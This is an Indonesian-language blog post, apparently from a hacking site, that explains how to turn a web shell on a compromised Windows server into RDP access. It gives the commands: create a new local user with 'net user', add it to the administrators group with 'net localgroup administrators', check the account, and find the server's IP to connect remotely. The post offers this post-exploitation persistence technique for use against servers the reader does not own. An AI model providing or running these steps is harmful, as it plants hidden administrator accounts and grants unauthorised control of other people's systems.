Cara Mendapatkan RDP Dari Shell Windows

Assalamualaikum wr.wb
kali ini saya akan share cara mendapatkan add admin rdp di shell windows server
Ciri ciri shell windows : c:/ e:/ d:/ f:/
atau bisa di liat dari kernelnya :)
Okkehh langsung saja cok :v

ALAT :

- Shell Windows
- Kopi
- U Mild

Ok Langsung saja haha, kebanyakan bacot ya, maklum orang tua



Ketik comand di shell : 
net user [nama] [Password] /add di sini gw bikin dengan
net user arul ganteng124# /add 



yeye sukses bikin user baru.
nah,sekarang kita buat user baru tadi menjadi administrator 
ketik comand : net localgroup administrators arul /add 




sukses juga menjadikan user tersebut administrator, nah sekarang apa lagi bang haurgeulis
kita cek user baru tadi dengan comand : net user [nama user]
ex : net user arul



oke selanjutnya kita cek ip dengan command : ipconfig




Nah itu kan udah kelihatan tuh IP nya,
tapi gw sensor banyak yang belum cukup umur haha
Done deh,semuanya tinggal di conect aja.



dah sekian dari saya :v
sumber : haurgeulis-security.com

0 Response to "Cara Mendapatkan RDP Dari Shell Windows"

Post a Comment